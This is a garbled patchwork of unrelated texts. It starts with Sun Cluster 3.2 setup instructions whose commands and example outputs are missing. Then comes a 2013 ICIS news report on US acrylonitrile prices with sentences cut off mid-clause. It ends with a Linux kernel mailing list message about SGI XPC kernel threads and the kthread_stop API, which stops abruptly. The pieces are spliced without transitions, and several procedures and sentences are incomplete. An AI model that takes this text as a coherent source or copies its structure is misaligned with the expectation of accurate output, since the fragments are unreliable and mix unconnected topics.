Thanks to that, you can still write your operations and fragments with graphql-tag and put them in your React components. GraphQL Config is smart enough to find and collect them.
Include and Exclude
The Include and Exclude options are still relevant, but we improved and fixed the logic behind them. Their purpose is to tell the config's consumer which files belong to what project. Files covered by the schema or documents options are automatically included; there's no need to include them twice.
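As a sketch (the globs here are invented for illustration), a config could then look like:

```yaml
schema: './schema/*.graphql'
documents: './src/**/*.graphql'
# schema and documents above belong to the project automatically;
# include/exclude describe the rest of the project tree
include: './src/**/*.ts'
exclude: './src/**/*.spec.ts'
```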
Extensions
We also kept extensions and turned them into a first-class citizen in GraphQL Config, making them way more powerful than before.
schema: './schema/*.graphql'
extensions:
  codegen:
    generates:
      ./src/types.ts:
        plugins:
          - typescript
          - typescript-resolvers
Pluggable loaders
The source of a GraphQL Schema may differ depending on the setup. In some projects the SDL is kept within .graphql files; others store it in code.
The new GraphQL Config is capable of loading schema from:
- .graphql files
- an introspection result file
- running endpoints
- files on GitHub
- files in a Git repository
- files with documents wrapped with graphql-tag and gatsby's graphql
- documents with the magic comment /* GraphQL */
- a single JavaScript or TypeScript file that exports a GraphQLSchema object, a DocumentNode or the schema as a string
The possibilities are endless here!
The main idea behind loaders is to extend the default behavior of GraphQL Config and allow to load GraphQL Schema from many different sources.
Loaders are flexible enough to let you decide what exactly you want to use, even just to keep the bundle size smaller.
It also simplifies the codebase of GraphQL tools as they don’t need to take care of that work themselves anymore.
export const RelayLoader = {
  loaderId() {
    return 'relay-loader';
  },
  canLoad(pointer) {
    return isReactFile(pointer);
  },
  load(pointer) {
    const document = extractDocument(pointer);
    return new Source({
      location: pointer,
      document,
    });
  },
};
We maintain a few loaders but we believe the community will start to cover other use cases as well.
All platforms
Our goal is to make GraphQL Config platform agnostic.
The old version relied heavily on Node’s file system, which is a blocker in many cases.
Loader fits here perfectly.
Because it’s just an asynchronous function that receives an input and gives back a GraphQL Schema, it should work fine in browser and in any other environment.
Extensions
In the previous generation of GraphQL Config, the extensions namespace was a way to pass custom information to the consumers of the config file, like libraries and IDE extensions.
We believe extensions should actually extend GraphQL Config's behavior.
Take for example loaders. Imagine you want to collect operations and fragments from your Relay project. With the new GraphQL Config, you can write a loader and register it through a Relay Extension.
const RelayExtension = (api) => {
  api.loaders.documents.register(RelayLoader);

  return {
    name: 'relay',
  };
};
The new extensions allow you to turn GraphQL Config into something fully customizable, to be used in tools like Webpack!
Hooks
We believe that there’s a need to intercept the schema building process or to simply validate the config.
It’s not currently available but with your help and suggestions we could make it happen.
Environment Variables
In the new GraphQL Config, we’ve decided to support environment variables. It was a long time hanging and highly requested issue. Now the usage in JS config file is straightforward. It’s also very easy to use environment variables in YAML and JSON files.
schema: './schema.graphql'
include: ${INCLUDE_GLOB}
Every ${ENV_VAR} in the config file is replaced with the actual value. We also allow for defaults: using ${ENV_VAR:foo} results in foo when the variable is not set.
Easier to contribute
We also wanted to make the codebase itself easy to understand and contribute to.
Our first task was to bring the repository back to life by updating the build and test setup.
The graphql-config package now ships with CommonJS and ES Modules thanks to Rollup and TypeScript. Tests are run with Jest. The codebase stays consistent because of Prettier and ESLint on top.
We also migrated from Travis to GitHub Actions and run tests on Node 8, 10 and 12.
To keep dependencies always up to date and to make sure no new release breaks GraphQL Config’s logic, we decided to use Dependabot.
We also addressed more than 70% of the issues and open PRs (and the remaining are waiting for feedback).
Start using it today!
Even though we are in an alpha phase, if you're the author or maintainer of a GraphQL library or another related tool, we encourage you to adopt the GraphQL Config standard.
Please link to this GitHub issue to track the progress.
If you have a project that uses those tools, we encourage you to try it out in your current project.
We will support and answer all your questions on Github and on our Discord channel. | https://the-guild.dev/blog/graphql-config | CC-MAIN-2021-31 | refinedweb | 1,467 | 60.95 |
Some Python modules from the standard library are known to not work within the sandbox restrictions.
The App Engine platform provides many services that your code can call. Your application can also configure scheduled tasks that run at specified intervals.
The Python Getting Started Guide provides an interactive introduction to developing web applications with Python and App Engine.
Selecting the Python 2 runtime
You specify the Python runtime environment in the
app.yaml configuration file,
which is used to deploy your application to App Engine. For example, you
set the runtime in the app.yaml file to use Python version 2.7. For more information about the app.yaml file and how to deploy your app to App Engine, see the app.yaml Reference, Migrating to Python 2.7, and Deploying a Python App topics.
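The snippet itself did not survive in this copy of the page; a minimal app.yaml for the Python 2.7 runtime looks like this (the handlers section is typical but assumed here):

```yaml
runtime: python27
api_version: 1
threadsafe: true

handlers:
- url: /.*
  script: main.app
```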
The sandbox

To allow App Engine to distribute requests for applications across multiple web servers, and to prevent one application from interfering with another, the application runs in a restricted "sandbox" environment. In this environment, the application can execute code, store and query data in Datastore, use the App Engine mail, URL fetch and users services, and examine the user's web request and prepare the response.
An App Engine application cannot:
write to the filesystem. Applications must use Datastore for storing persistent data instead. To control which local files are uploaded with the application, you override the skip_files element in your app.yaml file.
Pure Python

All code in the Python runtime environment must be pure Python. The version 2.7 runtime includes several third-party libraries.
Adding Third Party Python Libraries
You can include third party Python libraries with your application by putting the code in your application directory. If you make a symbolic link to a library's directory in your application directory, that link is followed and the library gets included in the app that you deploy to App Engine.
The include path of the Python module includes your application's root
directory, which is the directory containing the
app.yaml file. Python modules
that you create in your application's root directory are available using a path
from the root. Don't forget to create the required
__init__.py files in your
sub-directories so that Python recognizes those sub-directories as packages.
Also ensure that your libraries do not need any C extensions.
Threads
Threads can be created in Python version 2.7 using the
thread or
threading modules. Note that threads will be joined by the runtime
when the request ends so the threads cannot run past the end of the request.
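App Engine aside, the mechanics are plain Python threading. A standard-library-only sketch of request-scoped workers (no App Engine APIs involved; names like fetch_part are invented for illustration):

```python
import threading

results = []

def fetch_part(name):
    # stand-in for per-request work, e.g. RPCs made in parallel
    results.append('part:%s' % name)

# spawn workers during the "request"
workers = [threading.Thread(target=fetch_part, args=(n,)) for n in ('a', 'b')]
for w in workers:
    w.start()

# the App Engine runtime joins threads when the request ends;
# joining explicitly here makes the sketch deterministic
for w in workers:
    w.join()

print(sorted(results))  # ['part:a', 'part:b']
```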
Background threads
Code running on an instance with manual or basic scaling can start a background thread that can outlive the request that spawns it. This allows an instance to perform arbitrary periodic or scheduled tasks, or to continue working in the background after a request has returned to the user.
A background thread's
os.environ and logging entries are independent of those
of the spawning thread.
You must import the
google.appengine.api.background_thread module from the SDK
for App Engine.
from google.appengine.api import background_thread
The BackgroundThread class is like the regular Python threading.Thread class, but can "outlive" the request that spawns it. There is also the function start_new_background_thread(), which creates a background thread and starts it:
# sample function to run in a background thread
def change_val(arg):
    global val
    val = arg

if auto:
    # Start the new thread in one command
    background_thread.start_new_background_thread(change_val, ['Cat'])
else:
    # create a new thread and start it
    t = background_thread.BackgroundThread(
        target=change_val, args=['Cat'])
    t.start()
Tools
The SDK for App Engine includes tools for testing your application, uploading your application files, managing Datastore indexes, downloading log data, and uploading large amounts of data to the Datastore.
The development server runs your application on your local computer for testing. The server simulates the Datastore services and sandbox restrictions. The development server can also generate configuration for Datastore indexes based on the queries the app performs during testing.
The gcloud tool handles all command-line interaction with your application running on App Engine. You use gcloud app deploy to upload your application to App Engine, or to update individual configuration files like the Datastore index configuration, which allows you to build new indexes before deploying your code. You can also view your application's log data.
This page is a snapshot from the LWG issues list, see the Library Active Issues List for more information and the meaning of C++17 status.
Section: 19.3 [assertions] Status: C++17 Submitter: Daniel Krügler Opened: 2013-01-12 Last modified: 2017-07-30
Priority: 2
View other active issues in [assertions].
View all other issues in [assertions].
View all issues with C++17 status.
Discussion:
It is unclear from the current specification whether assert() expressions can be used in (potential) constant expressions. As an example consider the implementation of a constexpr function:
#include <cassert> template<class T, unsigned N> struct array { T data[N]; constexpr const T& operator[](unsigned i) const { return assert(i < N), data[i]; } }; int main() { constexpr array<int, 3> ai = {1, 2, 3}; constexpr int i = ai[0]; int j = ai[0]; // constexpr int k = ai[5]; }
The first question is whether this program is guaranteed well-formed? A second question is whether is would guaranteed to be ill-formed, if we uncomment the last code line in main()?
The wording in 19.3 [assertions] doesn't add anything significant to the C99 wording. From the C99 specification (7.2 p1 and 7.2.1.1 p2) we already get some valuable guarantees:
The expression assert(e) is a void expression for all expressions e independent of the definition of NDEBUG.
If NDEBUG is defined, assert(e) is equivalent to the expression void() (or anything that cannot be distinguished from that).
The current wording does not yet guarantee that assert expressions can be used in constant expressions, but all tested implementations (gcc, MSVC) would already support this use-case. It seems to me that this should be possible without giving assert a special meaning for the core language. As a related comment it should be added that there is a core language proposal that intends to relax some current constraints for constexpr functions and literal types. The most interesting changes (making void a literal type and allowing for expression-statements) would simplify the motivating example implementation of operator[] to:
constexpr const T& operator[](unsigned i) const { assert(i < N); return data[i]; };
[2013-03-15 Issues Teleconference]
Moved to Open.
We are still gaining experience with constexpr as a language feature, and there may be work in Evolution that would help address some of these concerns. Defer discussion until we have a group familiar with any evolutionary direction.
[2014-06-08, Daniel comments and suggests wording]
After approval of N3652, void is now a literal type and constexpr functions can contain multiple statements, so this makes the guarantee that assert expressions are per-se constexpr-friendly even more relevant. A possible wording form could be along the lines of:
For every core constant expression e of scalar type that evaluates to true after being contextually converted to bool, the expression assert(e) shall be a prvalue core constant expression of type void.
Richard Smith pointed out some weaknesses of this wording form, for example it would not guarantee to require the following example to work:
constexpr void check(bool b) { assert(b); }
because b is not a core constant expression in this context. He suggested improvements that led to the wording form presented below (any defects mine).
[Lenexa 2015-05-05]
MC : ran into this
Z : Is it guaranteed to be an expression?
MC : clarifies that assert runs at runtime, not sure what it does at compile time
STL : c standard guarantees its an expression and not a whole statement, so comma chaining it is ok
HH : Some implementations work as author wants it to
STL : also doing this as constexpr
DK/STL : discussing how this can actually work
HH : GCC 5 also implements it. We have implementor convergence
MC : Wants to do this without giving assert a special meaning
STL : NDEBUG being defined where assert appears is not how assert works. This is bug in wording. Should be "when assert is defined" or something like that. ... is a constant subexpression if NDEBUG is defined at the point where assert is last defined or redefined."
Would like to strike the "either" because ok if both debug or assertion is true. We want inclusive-or here
MC : is redefined needed?
STL : my mental model is its defined once and then redefined
HH : wants to up to P2
Z/STL : discussing how wording takes care of how/when assert is defined/redefined
STL/WB : discussing whether to move to ready or review. -> Want to move it to ready.
ask for updated wording
p3 -> p2
plan to go to ready after checking wording
[Telecon 2015-06-30]
HH: standardizing existing practice
MC: what about the comment from Lenexa about striking "either"?
HH: all three implementations accept it
MC: update issue to strike "either" and move to Tentatively Ready
Proposed resolution:
This wording is relative to N3936.

Previous resolution [SUPERSEDED]:
One way to partition the space of all possible $k$-mers is by minimal $l$-mer, where $l < k$. For example, the minimal 2-mer in the string
ABC is
AB and the minimal 4-mer in the string
abracadabra is
abra. In this context, the minimal $l$-mer is called a minimizer, and we'll call such a partitioning scheme a $k, l$-minimizing scheme.
def string_to_kmers(s, length):
    return [s[i:i+length] for i in xrange(len(s)-length+1)]

def minimizer(kmer, l):
    """ Given a k-mer, return its minimal l-mer """
    assert l <= len(kmer)
    return min(string_to_kmers(kmer, l))
minimizer('ABC', 2)
'AB'
minimizer('abracadabra', 4)
'abra'
But if our goal is to partition the space of $k$-mers, couldn't we use a hash function instead? Say $k$ is 10 and $l$ is 4. A 10,4-minimizing scheme is a way for dividing the space of $4^{10}$ 10-mers (a million or so) into $4^4 = 256$ partitions. We can accomplish this with a hash function that maps $k$-mers to integers in $[0, 255]$. Why would we prefer minimizers over hash functions?
The answer is that two strings that share long substrings tend to have the same minimizer, but not the same hash value. For example, the strings
abracadabr and
bracadabra have the substring
bracadabr in common, and they have the same minimal 4-mer:
minimizer('abracadabr', 4), minimizer('bracadabra', 4)
('abra', 'abra')
But their hash values (modulo 256) are not the same:
# you might need to 'pip install mmh3' first import mmh3 mmh3.hash('abracadabr') % 256, mmh3.hash('bracadabra') % 256
(26, 224)
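We can make the contrast quantitative. Adjacent 10-mers taken from one long string share a 9-mer, so they usually share a minimal 4-mer but rarely share a hash bucket. (A simple polynomial hash stands in for mmh3 below so the sketch has no dependencies, and it is written to run under Python 2 or 3; the exact agreement rates are illustrative.)

```python
import random

random.seed(0)

def string_to_kmers(s, length):
    return [s[i:i+length] for i in range(len(s) - length + 1)]

def minimizer(kmer, l):
    return min(string_to_kmers(kmer, l))

def bucket(s, mod=256):
    # simple polynomial hash standing in for mmh3.hash(s) % 256
    h = 0
    for c in s:
        h = (h * 31 + ord(c)) % mod
    return h

text = ''.join(random.choice('ACGT') for _ in range(5000))
windows = string_to_kmers(text, 10)          # overlapping 10-mers
pairs = list(zip(windows, windows[1:]))      # adjacent pairs share a 9-mer

min_agree = sum(minimizer(a, 4) == minimizer(b, 4) for a, b in pairs) / float(len(pairs))
hash_agree = sum(bucket(a) == bucket(b) for a, b in pairs) / float(len(pairs))
print(min_agree, hash_agree)  # minimizers agree far more often than hash buckets
```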
A feature of hash functions is that they divide the 10-mers quite uniformly (evenly) among the 256 buckets. 10,4-minimzers divide them much less uniformly. This becomes clear when you consider that, given a random 10-mer, the 4-mer
TTTT is very unlikely to be its minimizer, whereas the 4-mer
AAAA is much more likely.
We can also show this empirically by partitioning a collection of random 10-mers:
import random
random.seed(629)

def random_kmer(k):
    return ''.join([random.choice('ACGT') for _ in xrange(k)])
%matplotlib inline
import matplotlib.pyplot as plt

def plot_counts(counter, title=None):
    idx = range(256)
    cnts = map(lambda x: counter.get(x, 0), idx)
    plt.bar(idx, cnts, ec='none')
    plt.xlim(0, 256)
    plt.ylim(0, 35)
    if title is not None:
        plt.title(title)
    plt.show()
from collections import Counter

# hash 1000 random 10-mers
cnt = Counter([mmh3.hash(s) % 256 for s in [random_kmer(10) for _ in xrange(1000)]])
plot_counts(cnt, 'Frequency of partitions using hash mod 256')
def lmer_to_int(mer):
    """ Maps AAAA to 0, AAAC to 1, etc.  Works for any length argument. """
    cum = 0
    charmap = {'A':0, 'C':1, 'G':2, 'T':3}
    for c in mer:
        cum *= 4
        cum += charmap[c]
    return cum
# get minimal 4-mers from 1000 random 10-mers
cnt = Counter([lmer_to_int(minimizer(s, 4)) for s in [random_kmer(10) for _ in xrange(1000)]])
plot_counts(cnt, 'Frequency of partitions using minimal 4-mer; AAAA at left, TTTT at right')
Introduction
The .NET framework consists of several languages, all of which follow the "object-oriented programming" (OOP) approach to software development. This standard defines that all objects support
- Inheritance - the ability to inherit and extend existing functionality.
- Encapsulation - the ability to allow the user to only see specific parts, and to interact with it in specific ways.
- Polymorphism - the ability for an object to be assigned dynamically, but with some predictability as to what can be done with the object.
Objects are synonymous with objects in the real world. Think of any object and think of how it looks and how it is measured and interacted with. When creating OOP languages, the reasoning was that if a language mimics the thought process of humans, it will simplify the coding experience.
For example, let's consider a chair: its dimensions, weight, colour and what it is made of. In .NET, these values are called "Properties". These are values that define the object's state. Be careful, as there are two ways to expose values: Fields and Properties. The recommended approach is to expose Properties, not Fields.
So we have a real-world idea of the concept of an object. In practical terms, though, passing a whole object around within a program would consume a lot of resources. Think of a car and how many properties it has: hundreds, maybe thousands. A computer passing all of this information around all the time would waste memory and processing time. So objects come in two flavours:
- Reference types
- Value types
Reference and Value Types
A reference type is like a pointer to the value. Think of it like a piece of paper with a street address on it, and the address leads to your house - your object with hundreds of properties. If you want to find it, go to where the address says! This is exactly what happens inside the computer. The reference is stored as a number, corresponding to somewhere in memory where the object exists. So instead of moving an object around - like building a replica house every time you want to look at it - you just look at the original.
A value type is the exact value itself. Values are great for storing small amounts of information: numbers, dates etc.
There are differences in the way they are processed, so we will leave that until a little later in the article.
As well as querying values, we need a way to interact with the object so that some operation can be performed. Think of files - it's all well and good knowing the length of the file, but how about Read()'ing it? Therefore, we can use something called methods as a way of performing actions on an object.
An example would be a rectangle. The properties of a rectangle are:
- Length
- Width
The "functions" (or methods in .NET) would be:
- Area (= Length*Width)
- Perimeter (= 2*Length + 2*Width)
Methods vary from Properties because they require some transformation of data to achieve a result. Methods can either return a result (such as Area) or not. Like above with the chair, if you Sit() on the chair, there is no expected reaction, the chair just ... works!
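To make that concrete, here is a sketch in C#. The property and method names come from the lists above; the class itself is not part of the original article:

```csharp
class Rectangle
{
    // properties describing the object's state
    public int Length { get; set; }
    public int Width { get; set; }

    // methods that transform state into a result
    public int Area() { return Length * Width; }
    public int Perimeter() { return 2 * Length + 2 * Width; }
}
```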
System.Object
To support the first rule of OOP - Inheritance, we define something that all objects will derive from - this is System.Object, also known as Object or object. This object defines some methods that all objects can use should they need to. These methods include:
- GetHashCode() - retrieves a number unique to that object.
- GetType() - retrieves information about the object, like method names, the object's name, etc.
- ToString() - converts the object to a textual representation - usually for outputting to the screen or a file.
Since all objects derive from this class (whether you define it or not), any class will have these three methods ready to use. Because we always inherit from System.Object, or from a class that itself inherits from System.Object, we enhance and/or extend its functionality, just as in the real world humans, cats, dogs, birds and fish are all improved and specialised versions of an "organism".
Object basics
All objects by default are reference types. To support value types, objects must instead inherit from the System.ValueType abstract class, rather than System.Object.
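A short sketch of the difference in assignment behavior (the type names are invented for illustration):

```csharp
struct PointValue { public int X; }      // value type: the value itself is copied
class PointReference { public int X; }   // reference type: only the address is copied

class Demo
{
    static void Main()
    {
        PointValue v1 = new PointValue { X = 1 };
        PointValue v2 = v1;      // v2 is an independent copy
        v2.X = 99;               // v1.X is still 1

        PointReference r1 = new PointReference { X = 1 };
        PointReference r2 = r1;  // r2 points at the same object
        r2.X = 99;               // r1.X is now 99 too
    }
}
```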
Constructors
When objects are created, they are initialized by the "constructor". The constructor sets up the object, ready for use. Because objects need to be created before being used, a constructor is created implicitly unless the developer defines their own. There are several kinds of constructor:
- Copy Constructor
- Static Constructor
- Default constructor - takes no parameters.
- Overloaded constructor - takes parameters.
Overloaded constructors automatically remove the implicit default constructor, so a developer must explicitly define the default constructor, if they want to use it.
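A sketch of that rule (the class name is assumed): once the overloaded constructor exists, new Time() only compiles because the default constructor is declared explicitly.

```csharp
class Time
{
    public int Hours;

    public Time() { }        // explicit default constructor, restored by hand

    public Time(int hours)   // overloaded constructor removes the implicit one
    {
        Hours = hours;
    }
}
```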
A constructor is a special type of method in C# that allows an object to initialize itself when it is created. If a constructor method is used, there is no need to write a separate method to assign initial values to the data members of an object.
Important characteristics of a constructor method:
- A constructor method has the same name as the class itself.
- A constructor method is usually declared as public.
- Constructor method is declared as public because it is used to create objects from outside the class in which it is declared. We can also declare a constructor method as private, but then such a constructor cannot be used to create objects.
- Constructor methods do not have a return type (not even void).
- C# provides a default constructor to every class. This default constructor initializes the data members to zero. But if we write our own constructor method, then the default constructor is not used.
- A constructor method is used to assign initial values to the member variables.
- The constructor is called by the new keyword when an object is created.
- We can define more than one constructor in a class. This is known as constructor overloading. All the constructor methods have the same name, but their signatures are different, i.e., number and type of parameters are different.
- If a constructor is declared, no default constructor is generated.
Copy Constructor
A copy constructor creates an object by copying variables from another object. The copy constructor is called by creating an object of the required type and passing it the object to be copied.
In the following example, we pass a Rectangle object to the Rectangle constructor so that the new object has the same values as the old object.
using System;

namespace CopyConstructor
{
    class Rectangle
    {
        public int length;
        public int breadth;

        public Rectangle(int x, int y) // constructor fn
        {
            length = x;
            breadth = y;
        }

        public Rectangle(Rectangle r)
        {
            length = r.length;
            breadth = r.breadth;
        }

        public void display()
        {
            Console.WriteLine("Length = " + length);
            Console.WriteLine("Breadth = " + breadth);
        }
    } // end of class Rectangle

    class Program
    {
        public static void Main()
        {
            Rectangle r1 = new Rectangle(5, 10);
            Console.WriteLine("Values of first object");
            r1.display();

            Rectangle r2 = new Rectangle(r1);
            Console.WriteLine("Values of second object");
            r2.display();

            Console.ReadLine();
        }
    }
}
Static Constructor
A static constructor is called when the runtime first accesses the class. Static variables must be accessible at all times, so the runtime initializes them on that first access. Stepping through the example below in a debugger will show that static MyClass() is only invoked when the MyClass.Number variable is first accessed.
C# supports two types of constructors: static constructor and instance constructor. Whereas an instance constructor is called every time an object of that class is created, the static constructor is called only once. A static constructor is called before any object of the class is created, and is usually used to initialize any static data members of a class.
A static constructor is declared by using the keyword static in the constructor definition. This constructor cannot have any parameters or access modifiers. In addition, a class can only have one static constructor. For example:
using System;

namespace StaticConstructors
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Static Number = " + MyClass.Number);
        }
    }

    class MyClass
    {
        private static int _number;

        public static int Number
        {
            get { return _number; }
        }

        static MyClass()
        {
            Random r = new Random();
            _number = r.Next();
        }
    }
}
Default Constructor
The default constructor takes no parameters and is implicitly defined if no other constructors exist. The code sample below shows the before and after result of creating a class.
// Created by the developer
class MyClass
{
}

// Created by the compiler
class MyClass : System.Object
{
    public MyClass() : base()
    {
    }
}
Overloaded Constructors
To initialize objects in various forms, the constructors allow customization of the object by passing in parameters.
class MyClass
{
    private int _number;

    public int Number
    {
        get { return _number; }
    }

    public MyClass()
    {
        Random randomNumber = new Random();
        _number = randomNumber.Next();
    }

    public MyClass(int seed)
    {
        Random randomNumber = new Random(seed);
        _number = randomNumber.Next();
    }
}
Calling other constructors
To minimise code, if another constructor implements the functionality better, you can instruct the constructor to call an overloaded (or default) constructor with specific parameters.
class MyClass
{
    private int _number;

    public int Number
    {
        get { return _number; }
    }

    public MyClass() : this(DateTime.Now.Millisecond) // Call the other constructor, passing in a value.
    {
    }

    public MyClass(int seed)
    {
        Random r = new Random(seed);
        _number = r.Next();
    }
}
Base class constructors can also be called, instead of constructors in the current instance:
class MyException : Exception
{
    private int _number;

    public int Number
    {
        get { return _number; }
    }

    public MyException(int errorNumber, string message, Exception innerException)
        : base(message, innerException)
    {
        _number = errorNumber;
    }
}
Destructors
As well as being "constructed", objects can also perform cleanup when they are cleared up by the garbage collector. As with constructors, the destructor also uses the same name as the class, but is preceded by the tilde (~) sign. However, the garbage collector only runs when either directly invoked, or has reason to reclaim memory, therefore the destructor may not get the chance to clean up resources for a long time. In this case, look into use of the Dispose() method, from the IDisposable interface.
Destructors are recognised by the ~ symbol placed in front of what looks like a parameterless constructor, with no access modifier. For example:
class MyException : Exception
{
    private int _number;

    public int Number
    {
        get { return _number; }
    }

    public MyException(int errorNumber, string message, Exception innerException)
        : base(message, innerException)
    {
        _number = errorNumber;
    }

    ~MyException()
    {
    }
}
Copy Features (Data Management)
Summary
Copies features from the input feature class or layer to a new feature class. If the input is a layer which has a selection, only the selected features will be copied. If the input is a geodatabase feature class or shapefile, all features will be copied.
Usage
Both the geometry and attributes of the Input Features will be copied to the output feature class.
This tool can be used for data conversion as it can read many feature formats (any you can add to ArcMap) and write these to shapefile or geodatabase (File, Personal, or ArcSDE).
Syntax
Code Sample
The following Python window script demonstrates how to use the CopyFeatures tool in immediate mode.
import arcpy
from arcpy import env

env.workspace = "C:/data"
arcpy.CopyFeatures_management("climate.shp", "C:/output/output.gdb/climate")
The following stand-alone script demonstrates how to use CopyFeatures to copy the shapefiles in a folder to a file geodatabase.
# Name: CopyFeatures_Example2.py
# Description: Convert all shapefiles in a folder to geodatabase feature classes
# Requirements: os module

# Import system modules
import arcpy
from arcpy import env
import os

# Set environment settings
env.workspace = "C:/data"

# Set local variables
outWorkspace = "c:/output/output.gdb"

# Copy each shapefile in the workspace into the file geodatabase
for shapefile in arcpy.ListFeatureClasses():
    outFeatureClass = os.path.join(outWorkspace, os.path.splitext(shapefile)[0])
    arcpy.CopyFeatures_management(shapefile, outFeatureClass)
OK, this is an example of a class that implements overloaded operators to appear as built in type. We’ll define a currency class that allows you to store the type of currency and can convert between different currencies. This is a simple example of the type of Python assignment help we can offer.
Here is the skeletal class we will be extending. It has 2 currencies; feel free to add more.
from decimal import Decimal

_CURRENCIES = {"USD": "${:.2f}",
               "GBP": "\u00a3{:.2f}"}

class Currency():
    def __init__(self, amount=0, currency="GBP"):
        self.amount = Decimal(amount)
        self.currency = currency

    def __str__(self):
        return _CURRENCIES.get(self.currency).format(self.amount)

def main():
    price = Currency(16.75)
    print(price)

if __name__ == "__main__":
    main()
This code creates a price object and displays it. To make it useful, we want to be able to add currencies together and to multiply the price by an amount.
We want to allow the following.
def main():
    price = Currency(16.75)
    cost = price * 5
    taxes = cost * 0.20
    total = cost + taxes
    print(total)
If you run the code you will get an error message.
Traceback (most recent call last):
  File "C:/course/social/Currency.py", line 24, in <module>
    main()
  File "C:/course/social/Currency.py", line 17, in main
    cost = price * 5
TypeError: unsupported operand type(s) for *: 'Currency' and 'int'
So we need to support the multiply and the add. Add the following code to the class.
    def __mul__(self, other):
        return Currency(self.amount * Decimal(other), self.currency)

    def __add__(self, other):
        return Currency(self.amount + other.amount)
And that works perfectly. Let's extend it so that we can convert between currencies; add the following.
    print(total)

    dollars = total.to("USD")
    pounds = dollars.to("GBP")
    print(dollars, pounds)
    def to(self, currency):
        if self.currency == currency:
            return self
        return Currency(self.amount * _RATES[self.currency, currency], currency)

_RATES = {("USD", "GBP"): Decimal(1 / 1.3),
          ("GBP", "USD"): Decimal(1.3)}
This allows you to convert rates on the fly, so the one thing we have remaining would be to add pounds and dollars together. If you try it at the moment, the total will be incorrect since it won’t take the rate into account.
incorrect = dollars + pounds
print(incorrect)

£231.15
So we need to change the add method so that, if the currencies are not the same, it uses the first operand's currency for the result.
    def __add__(self, other):
        if self.currency == other.currency:
            return Currency(self.amount + other.amount, self.currency)
        return Currency(self.amount + other.to(self.currency).amount, self.currency)
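As a sanity check, the totals quoted in this walkthrough can be reproduced with plain Decimal arithmetic (same prices, tax and 1.3 GBP-to-USD rate as above; this block is independent of the Currency class):

```python
from decimal import Decimal

price = Decimal("16.75")
cost = price * 5                    # 83.75 GBP
taxes = cost * Decimal("0.20")      # 16.75 GBP
total = cost + taxes                # 100.50 GBP

rate = Decimal("1.3")               # GBP -> USD
dollars = total * rate              # 130.65 USD
pounds = dollars / rate             # 100.50 GBP

# Summing in the first operand's currency (USD), as the new __add__ does:
combined = dollars + pounds * rate  # 261.30 USD
print(combined)
```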
Now the output is $261.30, which is correct. We could add further changes, but this at least illustrates the mathematical operators. We might want to implement the comparisons so we can sort, so we will add that next.
prices = [Currency(10), Currency(5), Currency(20)]
print(sorted(prices))
This gives an error, TypeError: unorderable types: Currency() < Currency(), so let's add that.
    def __lt__(self, other):
        return self.amount < other.amount

    def __repr__(self):
        return str(self)
The __repr__ is there so that printing a list of prices works correctly.
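Comparisons other than < can be overloaded the same way. Here is a self-contained sketch adding equality and subtraction; it reuses the rate table from above, but the cross-currency behaviour is an extension of the article's code, not part of the original:

```python
from decimal import Decimal

_RATES = {("USD", "GBP"): Decimal(1) / Decimal("1.3"),
          ("GBP", "USD"): Decimal("1.3")}

class Currency:
    def __init__(self, amount=0, currency="GBP"):
        self.amount = Decimal(amount)
        self.currency = currency

    def to(self, currency):
        if self.currency == currency:
            return self
        return Currency(self.amount * _RATES[self.currency, currency], currency)

    def __eq__(self, other):
        # Equal if the amounts match once converted to one currency,
        # so $13.00 == £10.00 at a 1.3 rate.
        return self.amount == other.to(self.currency).amount

    def __sub__(self, other):
        # Like __add__: the result uses the left operand's currency.
        return Currency(self.amount - other.to(self.currency).amount, self.currency)
```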
This could be extended further to update the currency rates automatically each day, Python homework help could extend this for you if you wish. Look at the site on a regular basis for more example projects.
This code is presented by and copyright Programming Assignment Experts but license is granted to extend and use in any project as long as this message is included. | https://www.programmingassignmentexperts.com/blog/how-to-write-a-custom-class-in-python/ | CC-MAIN-2019-26 | refinedweb | 580 | 60.51 |
When an attempt is made to add a namespace node to an
element, and the namespace node uses a prefix that is
already in use for the element name, but with a
different URI, Saxon reports an error. For example,
with Saxon 7.2, the following fails:
<ns:e xmlns:ns="nsone.uri">
  <xsl:namespace name="ns">nstwo.uri</xsl:namespace>
</ns:e>
The same failure occurs in Saxon 6.5.2, if the
namespace node is created using <xsl:copy/> or
<xsl:copy-of/>.
This should not fail, because technically according to
the specification, a prefix for the element name is
only created at serialization time (or namespace fixup
time in XSLT 2.0), in other words no prefix for element
<{nsone.uri}e> should be allocated until the namespace
node has been successfully created.
The error message is "Cannot create two namespace nodes
with the same name".
Applies to 7.2, 6.5.2, and all earlier releases.
Test cases: nspc39, nspc40
Michael Kay
2002-11-12
Logged In: YES
user_id=251681
The example is incorrect, because literal result elements
are required to copy their namespace nodes. The following
example illustrates the problem with 6.5.2:
<xsl:element
<xsl:copy-of
</xsl:element>
Here the "ns" prefix in xsl:element is only a suggested
prefix, it should not be used in the result tree until it is
known that the prefix is not being used for a different purpose.
Source code fixed in 7.x branch.
A fix for 6.5.x will be more difficult and I might not
attempt it: it isn't worth risking destabilising the code
for such an obscure problem.
Michael Kay
2002-11-18
Logged In: YES
user_id=251681
Fixed in 7.3 | http://sourceforge.net/p/saxon/bugs/103/ | CC-MAIN-2014-42 | refinedweb | 286 | 65.83 |
Perform this procedure to configure a new cluster by using an XML cluster configuration file. The new cluster can be a duplication of an existing cluster that runs Sun Cluster 3.2 software.
This procedure configures the following cluster components:

Cluster name

Before You Begin

Ensure that Sun Cluster 3.2 software and patches are installed on each node that you will configure. See How to Install Sun Cluster Framework and Data-Service Software Packages.
Ensure that Sun Cluster 3.2 software is not yet configured on each potential cluster node.
Become superuser on a potential node that you want to configure in the new cluster.
Determine whether Sun Cluster 3.2 software is already configured on the potential node.
If the command returns the following message, proceed to Step c.
This message indicates that Sun Cluster software is not yet configured on the potential node.
If the command returns the node ID number, do not perform this procedure.
The return of a node ID indicates that Sun Cluster software is already configured on the node.
If the cluster is running an older version of Sun Cluster software and you want to install Sun Cluster 3.2 software, instead perform upgrade procedures in Chapter 8, Upgrading Sun Cluster Software.
Repeat Step a and Step b on each remaining potential node that you want to configure in the new cluster.
If Sun Cluster 3.2 software is not yet configured on any of the potential cluster nodes, proceed to Step 2.
If you are duplicating an existing cluster that runs Sun Cluster 3.2 software, use a node in that cluster to create a cluster configuration XML file.
Become superuser on an active member of the cluster that you want to duplicate.
Export the existing cluster's configuration information to a file.
Specifies the output destination.
The name of the cluster configuration XML file. The specified file name can be an existing file or a new file that the command will create.
For more information, see the cluster(1CL) man page.
Copy the configuration file to the potential node from which you will configure the new cluster.
